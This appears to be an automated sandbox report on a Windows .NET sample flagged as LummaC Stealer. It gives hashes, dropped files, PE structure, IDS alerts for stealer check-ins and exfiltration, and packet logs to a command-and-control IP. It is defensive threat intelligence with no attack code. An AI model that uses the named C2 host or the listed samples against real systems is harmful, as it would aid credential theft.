                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                      a0e9f5d64349fb13191bc781f81f42e1file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      xLauncher.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      Loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      Aura.exeGet hashmaliciousUnknownBrowse
                                                                      • 172.67.223.140
                                                                      injector V2.5.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      injector V2.4.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      loader.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      file.exeGet hashmaliciousLummaC StealerBrowse
                                                                      • 172.67.223.140
                                                                      No context
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):65536
                                                                      Entropy (8bit):0.9802806809519876
                                                                      Encrypted:false
                                                                      SSDEEP:192:kIBNwAv6yRkd0BU/fIxaGpezuiFKZ24IO8BB:tN367eBU/iahzuiFKY4IO8X
                                                                      MD5:C0A156DCD43B8B44339B72CA402051E6
                                                                      SHA1:9FBFFAA77A622A757D411DF38CA00A255989AD67
                                                                      SHA-256:DDF11E8E0C12BCDF261A505A727287E26C6872DF7FD2ABBEC1838A8C8C531848
                                                                      SHA-512:8BE5C457783E374A2F76F751FE4E06CBE4A19F9FC3565FEF844CFB01E90AD11AA67F25444FE69B25043071ED46E9D978471E13A0138920112A186D01B55161B8
                                                                      Malicious:true
                                                                      Reputation:low
                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.8.4.3.9.8.9.2.5.4.4.2.7.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.8.4.3.9.8.9.9.7.3.1.7.4.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.d.c.7.6.3.f.9.f.-.1.2.e.3.-.4.a.0.2.-.b.6.c.a.-.4.9.5.7.0.e.8.4.e.1.6.0.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.f.c.c.9.e.7.5.-.4.1.7.c.-.4.8.4.4.-.8.e.6.e.-.3.f.2.d.1.b.a.9.c.3.a.6.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.f.i.l.e...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.U.l.y.s.s.e.s.T.e.s.s.a.S.a.m.u.e.l...r.Y.P.I.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.d.c.-.0.0.0.1.-.0.0.1.4.-.d.6.2.b.-.4.e.f.5.a.f.3.d.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.c.e.f.4.d.e.a.f.3.9.4.d.f.0.5.a.5.3.d.8.7.a.1.8.8.a.e.2.5.3.3.6.0.0.0.0.0.0.0.0.!.0.0.0.0.3.3.3.e.e.9.d.7.f.4.c.6.8.3.d.8.e.0.e.d.0.5.b.d.a.d.f.b.d.2.b.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:Mini DuMP crash report, 15 streams, Sat Nov 23 13:59:49 2024, 0x1205a4 type
                                                                      Category:dropped
                                                                      Size (bytes):196644
                                                                      Entropy (8bit):3.3621640863548867
                                                                      Encrypted:false
                                                                      SSDEEP:1536:ErX4MppN4uE2aOkfWqLTg7o0tigCDCDWm/ZVMhwY1:Eb4MV4uEqnqLTg7oVfSj/ZhY
                                                                      MD5:41A7D359C296DC078C29AB6D61B91D8E
                                                                      SHA1:82C2966531027072D10AE5CFC1E6D4A551B2EE1C
                                                                      SHA-256:9D570129A9272A0D58DD3AD3AD91CD30205C0DF0E234B8CE2ADAA2FD8503EAF2
                                                                      SHA-512:0F91652402141F0FC07AB4F26CF3E401776413E0BB8A0E32B588A679D92CC3924E84CD20F85C770CFCE08160CE340B8235817C2FE8DE3B9B01204389EC80D7CD
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:MDMP..a..... .........Ag............D...............X.......$...........$....J..........`.......8...........T...........00..............,............ ..............................................................................eJ....... ......GenuineIntel............T.............Ag.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.......................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):8398
                                                                      Entropy (8bit):3.701438158704911
                                                                      Encrypted:false
                                                                      SSDEEP:192:R6l7wVeJ9C4665V6Y9lSU9PigmfZDmYXprQ89bUrsfv8m:R6lXJf6KV6YPSU9PigmfgYXUwfB
                                                                      MD5:C2B7F6C1A42CD64E4FA8485286861811
                                                                      SHA1:919C070BBE5C30115B3EEEFFCD8E67EAE82C73C4
                                                                      SHA-256:CC095056342B35A3393BB8760718C54C224707A14C2E831E593A851B7E99F09B
                                                                      SHA-512:728AD0652A0E71BB2CC832192001B00ED787514CF988AF7E19ED46B8F968543D533A2A9E25D4D4BEA12CD64B2D8B52233AAAD338438F8D189A44EE8DF793C6F6
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.3.2.<./.P.i.
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):4756
                                                                      Entropy (8bit):4.5046581231876415
                                                                      Encrypted:false
                                                                      SSDEEP:48:cvIwWl8zszJg77aI9/0WpW8VYSYm8M4Jf2FVe++q8v7nHyNBrGcd:uIjfNI7pt7VKJwe+KDHgrGcd
                                                                      MD5:ADAA035A356FC1F1853D818F2ABACE16
                                                                      SHA1:83030F80899E45BE71C32CF2FCA6D24C21621B0F
                                                                      SHA-256:3434041C419145AD20234D4745022C4CF29D068F6D7AA302B29526AB5F2F68FA
                                                                      SHA-512:BED7AD7534E42E90A654C92017FE838CE65E20D613F2E820AE640EE2288C825A6CFEEDC8F65CF7554CD4FDC23D32ADCEFF5BEFE51D6485A5990CABF8B5B87512
                                                                      Malicious:false
                                                                      Reputation:low
                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="600782" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                      Category:dropped
                                                                      Size (bytes):410624
                                                                      Entropy (8bit):7.076248937743528
                                                                      Encrypted:false
                                                                      SSDEEP:12288:TDWjE28LbqpSkloddKQbiqCUr/K/KwVR6uGqxwSVMFIYwXLIMO//jYqVBh5zh2ye:T6jE28LmpSkeddNbiqCUr/K/KwVR6uGZ
                                                                      MD5:3535FCD3063A2965F1DD8F9B65CA8355
                                                                      SHA1:1F5C89CAF911A08415D55CE1687101B65871B122
                                                                      SHA-256:086057602EEC63ED064BD97C1643B20C727AA4A557D16BD26A763716414620FE
                                                                      SHA-512:9B623500FFBE25D6DC08C3C90AEB8C123E9FC2841F0962B6FE57CA1D2AB44FB1062352E1D5AB1D506B156C0B25AAF96CA6267A36FD064C97C12DF965BCD66929
                                                                      Malicious:true
                                                                      Antivirus:
                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                      Reputation:low
                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......]6...W...W...W...<...W...<..W...<...W...<...W..>....W...W..{W..K"...W..K"...W..K"...W...W...W..."...W..."...W..Rich.W..........PE..L.....Ag...........!.........N.......n.......................................`............@..........................d..X....d..P............................P..l...\]..............................x]..@...............T............................text............................... ..`.rdata...\.......^..................@..@.data........p.......^..............@....reloc..l....P.......4..............@..B................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Windows\SysWOW64\WerFault.exe
                                                                      File Type:MS Windows registry file, NT/2000 or above
                                                                      Category:dropped
                                                                      Size (bytes):1835008
                                                                      Entropy (8bit):4.465934512343268
                                                                      Encrypted:false
                                                                      SSDEEP:6144:NIXfpi67eLPU9skLmb0b4CWSPKaJG8nAgejZMMhA2gX4WABl0uNPdwBCswSbXR:eXD94CWlLZMM6YFH1+XR
                                                                      MD5:1945A0081349AB013841E34653F7E19E
                                                                      SHA1:58287BEB77915C45BBD0270D10256EB50F298E71
                                                                      SHA-256:6727583F80110FB9E028F1798128C35398716D13E74FB8D8226EB0AE07AD30DF
                                                                      SHA-512:EF3A989128436B497EA5A8B6657F3393922F591141B69E4B3601C3561BAB9934EBC429E54C578F179D2AFC0984DE5BAD25A273CAB5CA370354DEB992D3C33774
                                                                      Malicious:false
                                                                      Preview:regf6...6....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm.....=.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                      Process:C:\Users\user\Desktop\file.exe
                                                                      File Type:ASCII text, with very long lines (354), with CRLF, LF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1415
                                                                      Entropy (8bit):4.5324638445490235
                                                                      Encrypted:false
                                                                      SSDEEP:24:7v74NuMMvXIUn2p/kpgw4r22Drrb2nknlusDp:7T4BMff2p8p14nrPKktp
                                                                      MD5:A0A7BDF9003524A40DA3745525F33D71
                                                                      SHA1:B92126A307BFE0131B3E83A45795D5E4169499DA
                                                                      SHA-256:871FB5E2F3DBA881F5446DCFCF7250DE2D8E7844BE8BB3CCD5EDD6910FAC6BDE
                                                                      SHA-512:56FA424A0714F4738F6AE5EEB93D1B96F046246B0CD9E67D93C833C5C7DB587A7A8BF9FBCF57CA8500D503C5C81DD68BD6E1E0E2A85E76A8E951E6624CBBC69D
                                                                      Malicious:false
                                                                      Preview:.Unhandled Exception: System.Resources.MissingManifestResourceException: Could not find any resources appropriate for the specified culture or the neutral culture. Make sure "caspol.resources" was correctly embedded or linked into assembly "UlyssesTessaSamuel" at compile time, or that all the satellite assemblies required are loadable and fully signed... at System.Resources.ManifestBasedResourceGroveler.HandleResourceStreamMissing(String fileName).. at System.Resources.ManifestBasedResourceGroveler.GrovelForResourceSet(CultureInfo culture, Dictionary`2 localResourceSets, Boolean tryParents, Boolean createIfNotExists, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo requestedCulture, Boolean createIfNotExists, Boolean tryParents, StackCrawlMark& stackMark).. at System.Resources.ResourceManager.InternalGetResourceSet(CultureInfo culture, Boolean createIfNotExists, Boolean tryParents).. at System.Resources.ResourceManager.GetSt
                                                                      File type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                      Entropy (8bit):7.735385458975907
                                                                      TrID:
                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 50.01%
                                                                      • Win32 Executable (generic) a (10002005/4) 49.96%
                                                                      • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                      File name:file.exe
                                                                      File size:665'088 bytes
                                                                      MD5:e7aa83909ace3906ec75144cc33e024c
                                                                      SHA1:333ee9d7f4c683d8e0ed05bdadfbd2baade379e3
                                                                      SHA256:24443cd457177eeed9c584e5d5ad194303fd94269fdb0d72e0db598215a5c826
                                                                      SHA512:508fd7984ea8b9d8c8b2cd3c7c3587941a6ee4627c7cf54fe56db7db75dbff0abdaf0db1b0c46876dc6ad0cc21735bd7a2f0351d5edeb735b2de796beef2ea72
                                                                      SSDEEP:12288:bPl8meB2qKGMi2z93d3xmOSv5PGsTgrc8JZJXC+2JW4Q+o95vlcJL1yC5qj1n93Z:7l87B2N+2z93WXuR4WJX
                                                                      TLSH:EAE46BDC766072EFC867D472DEA82C64FA5174BB971B4213902716AD9E0C89BDF180F2
                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....Ag..............0..................`... ....@.. ....................................@................................
                                                                      Icon Hash:90cececece8e8eb0
                                                                      Entrypoint:0x4aa00a
                                                                      Entrypoint Section:
                                                                      Digitally signed:false
                                                                      Imagebase:0x400000
                                                                      Subsystem:windows cui
                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                      DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                      Time Stamp:0x6741DBD1 [Sat Nov 23 13:42:41 2024 UTC]
                                                                      TLS Callbacks:
                                                                      CLR (.Net) Version:
                                                                      OS Version Major:4
                                                                      OS Version Minor:0
                                                                      File Version Major:4
                                                                      File Version Minor:0
                                                                      Subsystem Version Major:4
                                                                      Subsystem Version Minor:0
                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                                      Instruction
                                                                      jmp dword ptr [004AA000h]
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      add byte ptr [eax], al
                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x867d40x57.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xa60000x650.rsrc
                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0xa80000xc.reloc
                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_IAT0xaa0000x8
                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x860000x48.text
                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                      W{2/c0x20000x823780x82400c912d4bf7015ded3f1caaa4148e6b0c7False1.0003205224328215data7.999654523046763IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                      .text0x860000x1f0800x1f2008bd917f3fa084b717d1e42dad9da72b7False0.3297957454819277data4.694341381778728IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      .rsrc0xa60000x6500x8004f79bcd03748a48585ea3ccdf1f07d1cFalse0.34912109375data3.559434581534301IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                      .reloc0xa80000xc0x200aa2c9aa6be2e298aadf23de4a8183169False0.044921875data0.09800417566270775IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                      0xaa0000x100x200a861e2dbe40410218ba5bbf2f5899bf3False0.044921875data0.14263576814887827IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                      RT_VERSION0xa60a00x3c4data0.4221991701244813
                                                                      RT_MANIFEST0xa64640x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347
                                                                      DLLImport
                                                                      mscoree.dll_CorExeMain
                                                                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                      2024-11-23T14:59:50.863041+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449730172.67.223.140443TCP
                                                                      2024-11-23T14:59:51.810637+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.449730172.67.223.140443TCP
                                                                      2024-11-23T14:59:51.810637+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449730172.67.223.140443TCP
                                                                      2024-11-23T14:59:53.122240+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449732172.67.223.140443TCP
                                                                      2024-11-23T14:59:53.825426+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.449732172.67.223.140443TCP
                                                                      2024-11-23T14:59:53.825426+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449732172.67.223.140443TCP
                                                                      2024-11-23T14:59:55.416705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449734172.67.223.140443TCP
                                                                      2024-11-23T14:59:57.908705+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449737172.67.223.140443TCP
                                                                      2024-11-23T14:59:58.742675+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.449737172.67.223.140443TCP
                                                                      2024-11-23T15:00:00.236881+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449739172.67.223.140443TCP
                                                                      2024-11-23T15:00:02.720212+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449741172.67.223.140443TCP
                                                                      2024-11-23T15:00:05.070021+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449742172.67.223.140443TCP
                                                                      2024-11-23T15:00:09.634403+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.449744172.67.223.140443TCP
                                                                      2024-11-23T15:00:10.352806+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.449744172.67.223.140443TCP
                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                      Nov 23, 2024 14:59:49.616070986 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:49.616126060 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:49.616194010 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:49.618910074 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:49.618927956 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:50.862974882 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:50.863040924 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:50.993650913 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:50.993686914 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:50.994853020 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.042572975 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.121922970 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.121953964 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.122203112 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.810703993 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.810964108 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.811018944 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.812602043 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.812616110 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.812635899 CET49730443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.812640905 CET44349730172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.859738111 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.859770060 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:51.859863043 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.860233068 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:51.860246897 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.122061968 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.122240067 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.123642921 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.123656988 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.123970985 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.125222921 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.125240088 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.125291109 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825453997 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825558901 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825603962 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.825622082 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825711012 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825752974 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.825761080 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825830936 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.825869083 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.825875044 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.837690115 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.837729931 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.837743998 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.846138954 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.846187115 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.846199036 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.899585009 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.945135117 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:53.993438005 CET49732443192.168.2.4172.67.223.140
                                                                      Nov 23, 2024 14:59:53.993464947 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.026493073 CET44349732172.67.223.140192.168.2.4
                                                                      Nov 23, 2024 14:59:54.026567936 CET49732443192.168.2.4172.67.223.140
